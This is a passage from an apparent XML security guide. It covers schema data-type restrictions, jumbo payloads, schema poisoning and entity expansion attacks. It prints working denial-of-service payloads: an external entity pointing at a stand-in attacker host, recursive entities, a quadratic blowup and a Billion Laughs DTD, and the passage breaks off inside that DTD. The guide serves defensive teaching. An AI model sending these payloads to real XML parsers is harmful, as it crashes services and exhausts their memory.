Whenever user-controlled values are used as denominators in a division, developers should avoid allowing the number zero. In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions, and the program may crash. Some XML Schema data types exclude the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If a data type that admits zero is used instead, a zero denominator may trigger an error.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that these data types are commonly used for values that should only be real numbers, such as prices. This is a common error also seen in programming languages, not one restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values Infinity and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type decimal is recommended:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
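With this schema, the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; value cannot be set to Infinity or &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, because these values are not valid for the &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; data type and such a document will be rejected. If those values were allowed, an attacker could exploit the issue.&lt;br /&gt;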
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid.&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should be restricted to specific sets: traffic lights have only three colors, only 12 months are available, and so on. The schema can put these restrictions in place for each element or attribute. This is the ideal whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element &amp;lt;tt&amp;gt;month&amp;lt;/tt&amp;gt; to 12 possible values:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the &amp;lt;tt&amp;gt;month&amp;lt;/tt&amp;gt; element’s value to one of the previous values, the application will not have to handle arbitrary strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:minLength value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:maxLength value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where valid values must have an exact length (let's say 8), this can be specified as follows:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:length value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
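&lt;br /&gt;
Numeric values can be bounded in a similar way. The following sketch assumes a hypothetical &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; element that should only accept values from 1 to 100; both limits are illustrative and would depend on the application:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;quantity&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;!-- assumed lower and upper bounds, both inclusive --&amp;gt;&lt;br /&gt;
      &amp;lt;xs:minInclusive value=&amp;quot;1&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:maxInclusive value=&amp;quot;100&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;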
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. When you want to ensure that the data complies with a specific pattern, you can add a pattern restriction to the XML schema. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific pattern:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:pattern value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only values between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed for an SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components, available in XML Schema 1.1, constrain the existence and values of related elements and attributes. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed.&lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an assertion disallowing the number zero:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:assertion test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
Not defining a maximum number of occurrences can leave an application to cope with extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could have a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could have a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;buy&amp;quot; maxOccurs=&amp;quot;unbounded&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:all&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
            &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) number of &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements. This is a common finding, since developers do not normally want to restrict the maximum number of occurrences. Applications using limitless occurrences should test what happens when they receive an extremely large number of elements to be processed. Since computational resources are limited, the consequences should be analyzed and, eventually, a maximum number ought to be used instead of an unbounded value.&lt;br /&gt;
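&lt;br /&gt;
A bounded variant of the previous schema might look like the following sketch. The limit of 100 &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements per &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt; is an assumed value; an appropriate maximum depends on what the application can actually process:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;!-- assumed limit: between 1 and 100 buy elements --&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;buy&amp;quot; minOccurs=&amp;quot;1&amp;quot; maxOccurs=&amp;quot;100&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:all&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
            &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;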
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;soapenv:Envelope xmlns:soapenv=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot; xmlns:ext=&amp;quot;http://com/ibm/was/wssample/sei/echo/b2b/external&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;soapenv:Header largename1=&amp;quot;largevalue&amp;quot; largename2=&amp;quot;largevalue&amp;quot; largename3=&amp;quot;largevalue&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE includeme [&lt;br /&gt;
  &amp;lt;!ENTITY file SYSTEM &amp;quot;http://attacker/huge.xml&amp;quot; &amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;includeme&amp;gt;&amp;amp;file;&amp;lt;/includeme&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document.&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the &amp;lt;tt&amp;gt;note&amp;lt;/tt&amp;gt; element could be removed or altered, allowing any type of data to be sent to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read files from the server. An embedded schema of this kind only serves as a suggestion for how to build a document; to be used safely, there must be a way to check the integrity of the embedded schema.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not have the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 &amp;lt;pre&amp;gt;-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML document or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text, so an attacker could sniff the connection and modify the schema before it reaches the end user:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;http://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy.&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses.&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like https://example.com/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; references another entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is in turn defined as entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, the schema describes a circular reference between entities:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n^2)). The result of the following attack will be 100,000*100,000 (10^10) characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(100,000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(100,000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the nested entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
